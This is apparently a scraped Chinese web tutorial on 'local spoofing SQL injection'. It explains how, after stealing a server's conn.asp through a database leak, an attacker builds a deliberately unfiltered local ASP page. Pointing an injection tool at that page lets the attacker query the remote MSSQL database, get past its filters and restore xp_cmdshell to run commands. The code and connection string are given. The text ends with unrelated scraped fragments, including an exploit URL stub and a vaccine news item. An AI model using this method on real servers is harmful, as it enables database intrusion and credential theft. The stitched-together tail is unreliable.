时间:2021-05-23
何为本地注射?简单地讲,就是本来你在服务器上无法进行SQL注入,因为服务器上的WEB程序很安全,对request("id")这样的请求过滤很严,或是限制输入格式为数字等等方法,你只能选择放弃放弃注入。
但是在有的时候,你可以在本机的IIS里进行注入,从而达到对服务器注射的目的,避过服务器的request参数提交过滤。举例子来说明吧,现在你误打误撞,利用暴库或是其他的漏洞,得到了服务器的conn.asp文件,那么恭喜你,入侵离成功不远了。
conn.asp文件代码一般如下:
<%
Setconn=Server.CreateObject("ADODB.Connection")
conn.Open"PROVIDER=SQLOLEDB;DATASOURCE=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>
这里面记录的就是服务器的数据库的一些信息了,一般也会得到连接密码,说明是MSSQL的系统,非常好搞。如果服务器有URL可以进行SQL语句注射的话,恢复下XP_CMDshell,我们就能执行很多命令了,DOS命令也随便你。但是很可惜,我们不能注射,只有这么一个conn.asp文件可以利用。
那么,我们在本机来欺骗服务器,不过你要知道那个服务器采用的是什么web程序,不然你下面就不好写代码,我们来写一个sqltest.asp文件,在其中不做任何过滤,将这个文件和conn.asp一起放到你的IIS中的wwwroot下面,这样你就能通过Localhost来访问啦。
sqltest.asp代码如下:
<!--#includefile="conn.asp"-->
<%
dimrs,strSQL,id
setrs=server.createobject("ADODB.recordset")
id=request("id")
strSQL="select*fromDVBBSmdbwhereGuestID="&id
rs.openstrSQL,conn,1,3
rs.close
%>
那个DVBBSmdb是我虚构的,大家要改成这个web程序的数据库的库名。看到没有,id的提交参数没有经过任何的过滤,没有用replace或是其他的函数。现在我们在啊D中输入注射URL:http://localhost/sqltest.asp?id=1。接着用啊D在本地服务器执行命令或是跑用户名和密码,就等同于在你要入侵的服务器上进行注射,绕过了它的防注入措施。
这就是本地欺骗注射,明白了吧?
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
打开SQL用查询分析器连上,发现了几个数据库估计是服务器的几个网站共用的这一个SQLserver于是立刻本地构造一个注射点,准备列目录。构造注射点代码如下:★我
对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源
VulnerabilityDetails: sid变量未经过过滤产生SQL注射。 Exploits:http://site/plugin.php?id=
漏洞分析:官方最新过滤函数HTMLEncode,这次过滤了字符*,再一次绕过过滤注射FunctionHTMLEncode(fString)fString=Rep
3月26日消息,据报道,3月25日,亚马逊宣布将在多个仓库提供新冠疫苗注射服务。亚马逊称,已经在密苏里州的仓库(订单交付中心)设立现场疫苗点,给员工提供注射服务